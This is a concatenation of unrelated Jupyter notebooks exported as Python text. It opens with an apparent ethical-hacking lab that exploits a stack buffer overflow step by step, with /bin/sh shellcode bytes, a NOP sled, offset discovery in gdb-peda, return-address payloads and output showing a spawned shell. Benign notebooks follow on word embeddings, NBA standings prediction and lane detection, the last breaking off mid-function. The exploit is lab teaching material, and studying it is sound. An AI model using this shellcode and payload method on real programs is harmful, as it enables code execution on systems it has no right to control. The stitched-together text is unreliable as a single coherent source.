# ! python3 -c 'import sys; sys.stdout.buffer.write(b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80")' > shellcode1_py3.bin
# ! wc -c shellcode1_py3.bin
# ! hexdump -C shellcode1_py3.bin
# ### create payload
#
# - recall payload has the following structure
# ```
# | NOP sled | shellcode | controlled return address |
# ```
#
# - we found out that **144** is the total length of the payload as **140** is the offset
# - user shellcode (see above) is **24** bytes long
# - total bytes remaining for NOP sled and repeated return address can be calculated as following
print(144-24)
# - out of **120** bytes, return address size is 4 in 32-bit system
# - let's repeat the return address *5 times*
# - so the size of repeated return address = **5\*4 = 20**
# - that leaves us with **120 - 20 = 100 NOP sled**
# - **make sure length of (NOP sled + Shellcode) is a multiple of 4!**
# - so the one of the 4-byte repeated return addresses perfectly aligns at the (EBP+4) location
# - so, we'll create the payload file of the following structure
#
# ```
# | 100 NOP sled | 24 bytes shellcode | 5 controlled return addresses |
# ```
# let's create NOP sled of 100 bytes long and write it to payload.bin file
# ! python -c 'import sys; sys.stdout.buffer.write(b"\x90"*100)' > payload.bin
# let's append shellcode_py3.bin to payload.bin file
# ! cat shellcode_py3.bin >> payload.bin
# ! wc -c payload.bin
# - what's the address of buffer?
# - make sure we use the same size of junk as the size of the payload
# - this should be run directly from terminal as the buffer will shift if the program is run from the notebook
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ ./so_arg.exe $(python3 -c 'print("A"*144, end="")') <-- make sure to pass 144 bytes !!
# buffer is at 0xffffc2d0 <---- accurate buffer address we need
# buffer contains:
# AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# zsh: segmentation fault ./so_arg.exe $(python3 -c 'print("A"*144, end="")')
# ```
#
# - you can try landing at the base address of buffer or some bytes away from it, just in case!
# it's recommended to pick about 20 bytes away from the base address of the buffer
# if possible and necessary
# ! printf "%x" $((0xffffc2d0+20))
# but, let's just use the buffer's base address to start with...
# we repeat the return address 5 times
# ! python -c 'import sys; sys.stdout.buffer.write(b"\xd0\xcd\xff\xff"*5)' >> payload.bin
# out payload is ready; let's check size make sure it's the same as the offset
# ! wc -c payload.bin
# let's see the content using hexdump
# ! hexdump -C payload.bin
# #### finally, run the target program with the payload
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ ./so_arg.exe $(cat payload.bin)
# buffer is at 0xffffc2d0
# buffer contains:
# ����������������������������������������������������������������������������������������������������1�Ph//shh/bin��1ɉ�j
# X��������������������
# $ whoami
# kali
# $ date
# Wed Dec 16 23:32:08 MST 2020
# $ exit
#
# ```
# ## Use standard input to smuggle the shellcode
#
# - if the program takes data from standard input and the buffer overrun is possible, then shellcode can still be transmitted and the program exploited
# - the steps are slightly different from sending shellcode as an argument
# - let's work with `so_stdio.cpp` program to demonstrate the steps
# ! cat ./demos/stack_overflow/so_stdio.cpp
# + language="bash"
# input="./demos/stack_overflow/so_stdio.cpp"
# output=so_stdio.exe
#
# echo kali | sudo -S ./compile.sh $input $output
# -
# - since the stack_overflow_stdio.exe program reads the data from standard input, it can be piped to the program
# ! python -c 'print("Hello World")' | ./so_stdio.exe
# ### Crash the program
#
# - quick way to tell if the program has buffer overrun vulnerability, is to send a long string and see how the program reacts
# - if the program segfaults, it's a telltail sign that the program has buffer overflow flaw
# ! python -c 'print("A"*100)' | ./so_stdio.exe
# - because the size of the buffer is 128 and the data we sent was 100, this was okay as expected
# try longer string
# ! python -c 'print("A"*200)' | ./so_stdio.exe
# since Good bye! is not printed; system must have crashed!
# - so 200 is long enough (perhaps too long) to crash the program
# - let's find the offset of the caller's return address with respect to the buffer in gdb-peda
# - use PEDA's cyclic pattern technique as it's much faster than stepping through GDB
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ gdb -q so_stdio.exe
# Reading symbols from so_stdio.exe...
# ```
#
# - since the program reads the data from standard input, we need to pipe the cyclic pattern from a file
#
# ```bash
# gdb-peda$ pattern create 200 pattern.txt
# Writing pattern of 200 chars to filename "pattern.txt"
#
# gdb-peda$ run < pattern.txt
#
# Starting program: /home/kali/EthicalHacking/so_stdio.exe < pattern.txt
# buffer is at 0xffffc310
# Give me some text: Acknowledged: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA with length 200
#
# Program received signal SIGSEGV, Segmentation fault.
# [----------------------------------registers-----------------------------------]
# EAX: 0xf7fb2c00 --> 0xf7faf990 --> 0xf7ef71b0 (<_ZNSoD1Ev>: push ebx)
# EBX: 0x41416b41 ('AkAA')
# ECX: 0x6c0
# EDX: 0x8051bb0 ("Acknowledged: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAA"...)
# ESI: 0x6c414150 ('PAAl')
# EDI: 0xf7de6000 --> 0x1e4d6c
# EBP: 0x41514141 ('AAQA')
# ESP: 0xffffc3a0 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# EIP: 0x41416d41 ('AmAA')
# EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
# [-------------------------------------code-------------------------------------]
# Invalid $PC address: 0x41416d41
# [------------------------------------stack-------------------------------------]
# 0000| 0xffffc3a0 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0004| 0xffffc3a4 ("AASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0008| 0xffffc3a8 ("ApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0012| 0xffffc3ac ("TAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0016| 0xffffc3b0 ("AAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0020| 0xffffc3b4 ("ArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0024| 0xffffc3b8 ("VAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0028| 0xffffc3bc ("AAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# [------------------------------------------------------------------------------]
# Legend: code, data, rodata, value
# Stopped reason: SIGSEGV
# 0x41416d41 in ?? ()
#
# ```
#
# - now let's search for pattern to find the offset
#
# ```bash
# gdb-peda$ patts
#
# Registers contain pattern buffer:
# EBX+0 found at offset: 128
# EBP+0 found at offset: 136
# ESI+0 found at offset: 132
# EIP+0 found at offset: 140 <------ THIS IS OUR OFFSET !!!
# Registers point to pattern buffer:
# [ESP] --> offset 144 - size ~56
# Pattern buffer found at:
# 0x08051bbe : offset 0 - size 200 ([heap])
# 0x08051fc0 : offset 0 - size 200 ([heap])
# 0xf7c000cd : offset 33208 - size 4 (/usr/lib32/libm-2.31.so)
# 0xffffc310 : offset 0 - size 200 ($sp + -0x90 [-36 dwords])
# References to pattern buffer found at:
# 0xf7de6584 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
# 0xf7de6588 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
# 0xf7de658c : 0x08051fc0 (/usr/lib32/libc-2.31.so)
# 0xf7de6590 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
# 0xf7de6594 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
# 0xf7de6598 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
# 0xf7de659c : 0x08051fc0 (/usr/lib32/libc-2.31.so)
# 0xf7b6497c : 0xffffc310 (/usr/lib32/libm-2.31.so)
# 0xf7e62d0c : 0xffffc310 (/usr/lib32/libstdc++.so.6.0.28)
# 0xf7e668dc : 0xffffc310 (/usr/lib32/libstdc++.so.6.0.28)
# 0xffffbe00 : 0xffffc310 ($sp + -0x5a0 [-360 dwords])
#
# ```
#
# - so, the buffer length is **144 bytes** to completely overwrite the caller's return address
# - next, we need to find the base address of buffer whose location doesn't change with the size of stadard input data provided to the program
# - the base address of buffer is conveniently printed
# - create the payload in the form
# ```
# | NOP sled | shellcode | repeated return address |
# ```
# - we need to do some math to figure out the length of NOP sled and repeated return address we need to make the total payload length to be **144 bytes**
# - user shellcode size is fixed, let's copy and see the size
# ! cp ./shellcode/shellcode.bin .
# ! wc -c shellcode.bin
# this leaves us with
print(144-24)
# - since we've 120 bytes, let's use 10 repeated return address just in case
# - with the repeated return address length = `10 * 4 = 40`
# NOP sled length
print(120-40)
# - so we can use 80 NOP bytes as sled to slide down to our shellcode
# - now we have all the numbers we need to create our 144 long payload with shellcode
# ! python -c 'import sys; sys.stdout.buffer.write(b"\x90"*80)' > stdio_payload.bin
# ! wc -c stdio_payload.bin
# ! cat shellcode.bin >> stdio_payload.bin
# ! wc -c stdio_payload.bin
# - we need to get the buffer's address from the terminal, not from the Jupyter Notebook!
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ python -c 'print("A"*10)' | ./so_stdio.exe
# buffer is at 0xffffc360 <------ BASE ADDRESS OF BUFFER !!!
# Give me some text: Acknowledged: AAAAAAAAAA with length 10
# Good bye!
#
# ```
# ! python -c 'import sys; sys.stdout.buffer.write(b"\x60\xc3\xff\xff"*10)' >> stdio_payload.bin
# ! wc -c stdio_payload.bin
# - payload is ready and let's send it to the target program from the terminal
# - note the - (hyphen) after cat command is required to make the shell interactive
# - we don't get a prompt but an accessible terminal; just write some commands such as `whoami`, `ls`, etc.
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ cat stdio_payload.bin - | ./so_stdio.exe
# buffer is at 0xffffc360
# Give me some text:
# Acknowledged: ��������������������������������������������������������������������������������1�Ph//shh/bin��1ɉ�j
# X`���`���`���`���`���`���`���`���`���`��� with length 144
# whoami
# kali
# date
# Wed Dec 16 23:52:28 MST 2020
# exit
# ```
|
StackOverflow-RemoteCodeExecution.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] colab_type="text" id="17XKXlnyVBQF"
# # Embeddings
#
# An embedding maps discrete, categorical values to a continous space. Major advances in NLP applications have come from these continuous representations of words.
#
# If we have some sentence,
# + colab_type="code" id="303nHJfnVCoR" colab={}
# !pip install pymagnitude pytorch_pretrained_bert -q
# + colab_type="code" id="_H68bmuYVBQA" colab={}
import torch
import torch.nn as nn
from pymagnitude import Magnitude
import numpy as np
from tqdm import tqdm_notebook as tqdm
from scipy import spatial
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
from pytorch_pretrained_bert import BertTokenizer, BertModel, BertForMaskedLM
# %config InlineBackend.figure_format = 'svg'
# %matplotlib inline
RED, BLUE = '#FF4136', '#0074D9'
# + colab_type="code" id="fxTuHmKiVBQH" colab={}
sentence = 'the quick brown fox jumps over the lazy dog'
words = sentence.split()
words
# + [markdown] colab_type="text" id="iKfSGpJxVBQP"
# We first turn this sentence into numbers by assigning each unique word an integer.
# + colab_type="code" id="LWXE9OmDVBQR" colab={}
word2idx = {word: idx for idx, word in enumerate(sorted(set(words)))}
word2idx
# + [markdown] colab_type="text" id="R8plCT7bVBQX"
# Then, we turn each word in our sentence into its assigned index.
# + colab_type="code" id="aB40yyPSVBQY" colab={}
idxs = torch.LongTensor([word2idx[word] for word in sentence.split()])
idxs
# + [markdown] colab_type="text" id="4xE--RIrVBQe"
# Next, we want to create an **embedding layer**. The embedding layer is a 2-D matrix of shape `(n_vocab x embedding_dimension)`. If we apply our input list of indices to the embedding layer, each value in the input list of indices maps to that specific row of the embedding layer matrix. The output shape after applying the input list of indices to the embedding layer is another 2-D matrix of shape `(n_words x embedding_dimension)`.
# + colab_type="code" id="VlF7QIr5VBQg" colab={}
embedding_layer = nn.Embedding(num_embeddings=len(word2idx), embedding_dim=3)
embeddings = embedding_layer(idxs)
embeddings, embeddings.shape
# + [markdown] colab_type="text" id="5G_N4Cb0VBQl"
# The PyTorch builtin embedding layer comes with randomly initialized weights that are updated with gradient descent as your model learns to map input indices to some kind of output. However, often it is better to use pretrained embeddings that do not update but instead are frozen.
# + [markdown] colab_type="text" id="nWFKrgx-VBQm"
# ## GloVe Embeddings
#
# GloVe embeddings are one of the most popular pretrained word embeddings in use. You can download them [here](https://nlp.stanford.edu/projects/glove/). For the best performance for most applications, I recommend using their Common Crawl embeddings with 840B tokens; however, they take the longest to download, so instead let's download the Wikipedia embeddings with 6B tokens
# + colab_type="code" id="FKo_Pg6wVBQn" colab={}
# Download GloVe vectors (uncomment the below)
# # !wget http://nlp.stanford.edu/data/glove.6B.zip && unzip glove.6B.zip && mkdir glove && mv glove*.txt glove
# GLOVE_FILENAME = 'glove/glove.6B.50d.txt'
# glove_index = {}
# n_lines = sum(1 for line in open(GLOVE_FILENAME))
# with open(GLOVE_FILENAME) as fp:
# for line in tqdm(fp, total=n_lines):
# split = line.split()
# word = split[0]
# vector = np.array(split[1:]).astype(float)
# glove_index[word] = vector
# glove_embeddings = np.array([glove_index[word] for word in words])
# # Because the length of the input sequence is 9 words and the embedding
# # dimension is 50, the output shape is `(9 x 50)`.
# glove_embeddings.shape
# + [markdown] colab_type="text" id="2StD14zGVBQ3"
# ### Magnitude Library for Fast Vector Loading
# + [markdown] colab_type="text" id="rvyAGoEIVBQ4"
# Loading the entire GloVe file can take up a lot of memory. We can use the `magnitude` library for more efficient embedding vector loading. You can download the magnitude version of GloVe embeddings [here](https://github.com/plasticityai/magnitude#pre-converted-magnitude-formats-of-popular-embeddings-models).
# + colab_type="code" id="vnzGlMubVBQ5" colab={}
# !wget http://magnitude.plasticity.ai/glove/light/glove.6B.50d.magnitude glove/
# + colab_type="code" id="w-0r7FHLVBQ-" colab={}
# Load Magnitude GloVe vectors
glove_vectors = Magnitude('glove/glove.6B.50d.magnitude')
# + colab_type="code" id="DP2sOnZ1VBRC" colab={}
glove_embeddings = glove_vectors.query(words)
# + [markdown] colab_type="text" id="ARcZ2PwsVBRG"
# ## Similarity operations on embeddings
# + colab_type="code" id="8Ara5883VBRH" colab={}
def cosine_similarity(word1, word2):
vector1, vector2 = glove_vectors.query(word1), glove_vectors.query(word2)
return 1 - spatial.distance.cosine(vector1, vector2)
# + colab_type="code" id="LQV1Ur9PVBRO" colab={}
word_pairs = [
('dog', 'cat'),
('tree', 'cat'),
('tree', 'leaf'),
('king', 'queen'),
]
for word1, word2 in word_pairs:
print(f'Similarity between "{word1}" and "{word2}":\t{cosine_similarity(word1, word2):.2f}')
# + [markdown] colab_type="text" id="3mvCSt-2VBRV"
# ## Visualizing Embeddings
#
# We can demonstrate that embeddings carry semantic information by plotting them. However, because our embeddings are more than three dimensions, they are impossible to visualize. Therefore, we can use an algorithm called t-SNE to project the word embeddings to a lower dimension in order to plot them in 2-D.
# + colab_type="code" id="MYoO6T2kVBRX" colab={}
ANIMALS = [
'whale',
'fish',
'horse',
'rabbit',
'sheep',
'lion',
'dog',
'cat',
'tiger',
'hamster',
'pig',
'goat',
'lizard',
'elephant',
'giraffe',
'hippo',
'zebra',
]
HOUSEHOLD_OBJECTS = [
'stapler',
'screw',
'nail',
'tv',
'dresser',
'keyboard',
'hairdryer',
'couch',
'sofa',
'lamp',
'chair',
'desk',
'pen',
'pencil',
'table',
'sock',
'floor',
'wall',
]
# + colab_type="code" id="5R_k2AiCVBRd" colab={}
tsne_words_embedded = TSNE(n_components=2).fit_transform(glove_vectors.query(ANIMALS + HOUSEHOLD_OBJECTS))
tsne_words_embedded.shape
# + colab_type="code" id="OfM7fFagVBRh" colab={}
x, y = zip(*tsne_words_embedded)
fig, ax = plt.subplots(figsize=(10, 8))
for i, label in enumerate(ANIMALS + HOUSEHOLD_OBJECTS):
if label in ANIMALS:
color = BLUE
elif label in HOUSEHOLD_OBJECTS:
color = RED
ax.scatter(x[i], y[i], c=color)
ax.annotate(label, (x[i], y[i]))
ax.axis('off')
plt.show()
# + [markdown] colab_type="text" id="IFfVbmhfVBRl"
# ## Context embeddings
#
# GloVe and Fasttext are two examples of global embeddings, where the embeddings don't change even though the "sense" of the word might change given the context. This can be a problem for cases such as:
#
# - A **mouse** stole some cheese.
# - I bought a new **mouse** the other day for my computer.
#
# The word mouse can mean both an animal and a computer accessory depending on the context, yet for GloVe they would receive the same exact distributed representation. We can combat this by taking into account the surroudning words to create a context-sensitive embedding. Context embeddings such as Bert are really popular right now.
#
#
# + colab_type="code" id="v2Kqxd54VBRm" colab={}
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
model = BertModel.from_pretrained('bert-base-uncased')
model.eval()
def to_bert_embeddings(text, return_tokens=False):
if isinstance(text, list):
# Already tokenized
tokens = tokenizer.tokenize(' '.join(text))
else:
# Need to tokenize
tokens = tokenizer.tokenize(text)
tokens_with_tags = ['[CLS]'] + tokens + ['[SEP]']
indices = tokenizer.convert_tokens_to_ids(tokens_with_tags)
out = model(torch.LongTensor(indices).unsqueeze(0))
# Concatenate the last four layers and use that as the embedding
# source: https://jalammar.github.io/illustrated-bert/
embeddings_matrix = torch.stack(out[0]).squeeze(1)[-4:] # use last 4 layers
embeddings = []
for j in range(embeddings_matrix.shape[1]):
embeddings.append(embeddings_matrix[:, j, :].flatten().detach().numpy())
# Ignore [CLS] and [SEP]
embeddings = embeddings[1:-1]
if return_tokens:
assert len(embeddings) == len(tokens)
return embeddings, tokens
return embeddings
# + colab_type="code" id="W6PAaDILVBRq" colab={}
words_sentences = [
('mouse', 'I saw a mouse run off with some cheese.'),
('mouse', 'I bought a new computer mouse yesterday.'),
('cat', 'My cat jumped on the bed.'),
('keyboard', 'My computer keyboard broke when I spilled juice on it.'),
('dessert', 'I had a banana fudge sunday for dessert.'),
('dinner', 'What did you eat for dinner?'),
('lunch', 'Yesterday I had a bacon lettuce tomato sandwich for lunch. It was tasty!'),
('computer', 'My computer broke after the motherdrive was overloaded.'),
('program', 'I like to program in Java and Python.'),
('pasta', 'I like to put tomatoes and cheese in my pasta.'),
]
words = [words_sentence[0] for words_sentence in words_sentences]
sentences = [words_sentence[1] for words_sentence in words_sentences]
# + colab_type="code" id="KVSuEP8fVBRt" colab={}
embeddings_lst, tokens_lst = zip(*[to_bert_embeddings(sentence, return_tokens=True) for sentence in sentences])
words, tokens_lst, embeddings_lst = zip(*[(word, tokens, embeddings) for word, tokens, embeddings in zip(words, tokens_lst, embeddings_lst) if word in tokens])
# Convert tuples to lists
words, tokens_lst, tokens_lst = map(list, [words, tokens_lst, tokens_lst])
# + colab_type="code" id="SBCrt11cVBRw" colab={}
target_indices = [tokens.index(word) for word, tokens in zip(words, tokens_lst)]
# + colab_type="code" id="IT7nqNYbVBRz" colab={}
target_embeddings = [embeddings[idx] for idx, embeddings in zip(target_indices, embeddings_lst)]
# + colab_type="code" id="_x17Kq7mVBR1" colab={}
tsne_words_embedded = TSNE(n_components=2).fit_transform(target_embeddings)
x, y = zip(*tsne_words_embedded)
fig, ax = plt.subplots(figsize=(5, 10))
for word, tokens, x_i, y_i in zip(words, tokens_lst, x, y):
ax.scatter(x_i, y_i, c=RED)
ax.annotate(' '.join([f'$\\bf{x}$' if x == word else x for x in tokens]), (x_i, y_i))
ax.axis('off')
plt.show()
# + [markdown] colab_type="text" id="x64xA81sVBR6"
# ## Try-it-yourself
#
# - Use the Magnitude library to load other pretrained embeddings such as Fasttext
# - Try comparing the GloVe embeddings with the Fasttext embeddings by making t-SNE plots of both, or checking the similarity scores between the same set of words
# - Make t-SNE plots using your own words and categories
# + colab_type="code" id="QDP37tWKVBR7" colab={}
|
notebooks/pyTorch/2_embeddings.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
pip install mysql-connector-python
import mysql.connector
#COnnect to the SQL server and show all databases
mydb = mysql.connector.connect(
host="localhost", #Leave as localhost for localserver
user="root",
passwd="",
database = "players" #Database name
)
Teams = ["MIL","TOR","GSW","DEN","HOU","PHI","POR","UTA","BOS","OKC","IND",
"LAC","SAS","BKN","ORL","DET","CHA","MIA","SAC","LAL","MIN",
"DAL","MEM","NOP","WAS","ATL","CHI","CLE","PHX","NYK"]
predictedStandings = []
players = []
playersTemp = []
playersTeam = []
for Team in Teams:
playersTemp = []
playersTeam = []
cursor = mydb.cursor()
sql = "SELECT * FROM nba20182019 WHERE Team = %s" #SELECT * FROM TableName
team = (Team, )
cursor.execute(sql, team)
playersTemp = cursor.fetchall()
for player in playersTemp:
playersTemp2 = [player[2],player[1],player[-2]]
playersTeam.append(playersTemp2)
players.append(playersTeam)
# +
def split(arr,low,high):
i = (low-1) #Index of smaller element
splitPoint = arr[high][-1]
for j in range(low,high):
if arr[j][-1] <= splitPoint:
# increment index of smaller element
i = i+1
arr[i],arr[j] = arr[j],arr[i]
arr[i+1],arr[high] = arr[high],arr[i+1]
return (i+1)
def quickSort(arr,low,high):
if low < high:
splitIndex = split(arr,low,high)
quickSort(arr, low, splitIndex-1)
quickSort(arr, splitIndex, high)
# +
teamSize = 1
numTeams = 30
averageAccuracy = 30
finalTeamSize = 1
while teamSize < 16:
predictedStandings = []
accuracy = 0
for Team in players:
totalFER = 0
count = 0
for count in range(teamSize):
totalFER = totalFER + Team[count][2]
temp = [Team[0][0],totalFER]
predictedStandings.append(temp)
quickSort(predictedStandings,0,29)
predictedStandings.reverse()
count = 1
for Team in predictedStandings:
teamName = Team[0]
actualRank = Teams.index(teamName) + 1
rankDifference = actualRank - count
if rankDifference <= 0:
rankDifference = rankDifference * -1
accuracy = accuracy + rankDifference
count = count + 1
averageAccuracyTemp = accuracy / numTeams
print("Team Size: " + str(teamSize))
print("Average Accuracy: +/- " + str(averageAccuracyTemp) + " positions out of 30")
print(predictedStandings)
if averageAccuracyTemp <= averageAccuracy:
averageAccuracy = averageAccuracyTemp
finalTeamSize = teamSize
teamSize = teamSize + 1
print("Most Accurate Team Size: " + str(finalTeamSize))
print("Average Accuracy: " + str(100-averageAccuracy/numTeams*100) + "% or +/- " + str(averageAccuracy) + " positions out of 30.")
# -
Teams = ["MIL","TOR","GSW","DEN","HOU","PHI","POR","UTA","BOS","OKC","IND",
"LAC","SAS","BKN","ORL","DET","CHA","MIA","SAC","LAL","MIN",
"DAL","MEM","NOP","WAS","ATL","CHI","CLE","PHX","NYK"]
predictedStandings = []
players = []
playersTemp = []
playersTeam = []
for Team in Teams:
playersTemp = []
playersTeam = []
cursor = mydb.cursor()
sql = "SELECT * FROM nba20192020 WHERE Team = %s"
team = (Team, )
cursor.execute(sql, team)
playersTemp = cursor.fetchall()
for player in playersTemp:
playersTemp2 = [player[2],player[1],player[-2]]
playersTeam.append(playersTemp2)
players.append(playersTeam)
teamSize = 2 #Use most accurate team size found in the last cell
numTeams = 30
predictedStandings = []
for Team in players:
totalFER = 0
count = 0
for count in range(teamSize):
totalFER = totalFER + Team[count][2]
temp = [Team[0][0],totalFER]
predictedStandings.append(temp)
quickSort(predictedStandings,0,29)
predictedStandings.reverse()
predictedStandings
|
NBAPlayoffStatsRead.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [conda env:root]
# language: python
# name: conda-root-py
# ---
# ## Advanced Lane Finding Project
#
# The goals / steps of this project are the following:
#
# * Compute the camera calibration matrix and distortion coefficients given a set of chessboard images.
# * Apply a distortion correction to raw images.
# * Use color transforms, gradients, etc., to create a thresholded binary image.
# * Apply a perspective transform to rectify binary image ("birds-eye view").
# * Detect lane pixels and fit to find the lane boundary.
# * Determine the curvature of the lane and vehicle position with respect to center.
# * Warp the detected lane boundaries back onto the original image.
# * Output visual display of the lane boundaries and numerical estimation of lane curvature and vehicle position.
# ## Initialization
# +
import numpy as np # For numerical calculations
import cv2 # For OpenCV libraries
import glob # For group input of images
import matplotlib.pyplot as plt # Plotting library
# %matplotlib qt
# For video IO and processing
from moviepy.editor import VideoFileClip
from IPython.display import HTML
# -
# ## 1. Camera Calibration using Chessboard Images
def cameraCalibration():
# Using checkerboard images with 9x6 number of inside indices
objp = np.zeros((6*9,3), np.float32)
objp[:,:2] = np.mgrid[0:9,0:6].T.reshape(-1,2)
# Arrays to store object points and image points from all the images.
objpoints = [] # 3d points in real world space
imgpoints = [] # 2d points in image plane.
# Make a list of calibration images
images = glob.glob('camera_cal/calibration*.jpg')
# Step through the list and search for chessboard corners
for fname in images:
img = cv2.imread(fname) # Reads each frame as an iamge
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY) # Convert t ograyscale
img_size = (gray.shape[1], gray.shape[0])
# Find the chessboard corners
ret, corners = cv2.findChessboardCorners(gray, (9,6),None)
# If found, add object points, image points
if ret == True:
objpoints.append(objp)
imgpoints.append(corners)
# Use all found corners and image points
ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)
return mtx, dist
# ## 2. Distortion Correction
def undistort(img, mtx, dist):
# Use generated parameters to undistort each image without recalculating coefficients
undistorted = cv2.undistort(img, mtx, dist, None, mtx)
return undistorted
# ## 3. Color/Gradient Thresholds with Gaussian Blur
def colorGradient(img, s_thresh=(170, 255), sx_thresh=(21, 100)):
copy = np.copy(img)
#Use kernal size to filter out noise
kernel_size = 11
blur = cv2.GaussianBlur(copy, (kernel_size, kernel_size), 0)
# Convert to HLS color space and separate the V channel
hls = cv2.cvtColor(blur, cv2.COLOR_RGB2HLS)
l_channel = hls[:,:,1]
s_channel = hls[:,:,2]
# Sobel x
sobelx = cv2.Sobel(l_channel, cv2.CV_64F, 1, 0) # Take the derivative in x
abs_sobelx = np.absolute(sobelx) # Absolute x derivative to accentuate lines away from horizontal
scaled_sobel = np.uint8(255*abs_sobelx/np.max(abs_sobelx))
# Threshold x gradient
sxbinary = np.zeros_like(scaled_sobel)
sxbinary[(scaled_sobel >= sx_thresh[0]) & (scaled_sobel <= sx_thresh[1])] = 1
# Threshold color channel
s_binary = np.zeros_like(s_channel)
s_binary[(s_channel >= s_thresh[0]) & (s_channel <= s_thresh[1])] = 1
# Stack each channel
color_binary = np.zeros_like(s_channel)
color_binary[(s_binary == 1) | (sxbinary == 1)] = 1
return color_binary
# ## 4. Perspective Transform (Bird's Eye View)
# Define a function that takes an image, number of x and y points,
# camera matrix and distortion coefficients
def perspectiveTransform(img):
# Estimated source and destination values for a bird's eye view of the road
# Values were determined using estimates from two straight line images
h = img.shape[0]
w = img.shape[1]
img_size = (w,h)
mid_offset = 90
# Top left, top right, bottom left, bottom right
src = np.float32([[w/2-mid_offset, 460], [w/2+mid_offset, 460], [0, h-15], [w, h-15]])
dst = np.float32([[0, 0], [w, 0], [0, h], [w, h]])
# Given src and dst points, calculate the perspective transform matrix
M = cv2.getPerspectiveTransform(src, dst)
# Warp the image using OpenCV warpPerspective()
transformed = cv2.warpPerspective(img, M, img_size, flags=cv2.INTER_LINEAR)
# Return the resulting image and matrix
return transformed
# ## 5. Lane Boundary Detection and Vehicle Position
def detectLane(image, left_fit, right_fit):
# Check if this is the first iteration -> Use windows and histograms
if (left_fit == [0,0,0] and right_fit == [0,0,0]):
# Find our lane pixels first
leftx, lefty, rightx, righty = windowHistograms(image)
else:
leftx, lefty, rightx, righty = searchAroundPoly(image, left_fit, right_fit)
# Obtain polynomial coefficients in both pixels and meters
left_fitx, right_fitx, left_fit_rw, right_fit_rw, ploty = fit_poly(image.shape, leftx, lefty, rightx, righty)
# Calculate curvature in meters
curvature = measure_curvature_real(ploty, left_fit_rw, right_fit_rw)
# Calculate offset in meters using the meters per pixel ratio
# Assumption: Center of the image/video is the center of the car
xm_per_pix = 3.7/700 # meters per pixel in x dimension
offset = (640 - (left_fitx[-1] + right_fitx[-1])/2)*xm_per_pix
# Visualization using generated polynomial lane curve estimates
margin = 30 # Pixels on each side of the polynomial curve
out_img = np.dstack((image, image, image))*255
# Generate a polygon to illustrate the search window area
# And recast the x and y points into usable format for cv2.fillPoly()
# Left Lane
left_line_window1 = np.array([np.transpose(np.vstack([left_fitx-margin, ploty]))])
left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([left_fitx+margin,
ploty])))])
left_line_pts = np.hstack((left_line_window1, left_line_window2))
# Right Lane
right_line_window1 = np.array([np.transpose(np.vstack([right_fitx-margin, ploty]))])
right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx+margin,
ploty])))])
right_line_pts = np.hstack((right_line_window1, right_line_window2))
# Central (Safe) Area
center_window1 = np.array([np.transpose(np.vstack([left_fitx+margin, ploty]))])
center_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx-margin,
ploty])))])
center_pts = np.hstack((center_window1, center_window2))
# Draw the lane onto the warped blank image
cv2.fillPoly(out_img, np.int_([left_line_pts]), (255, 0, 0))
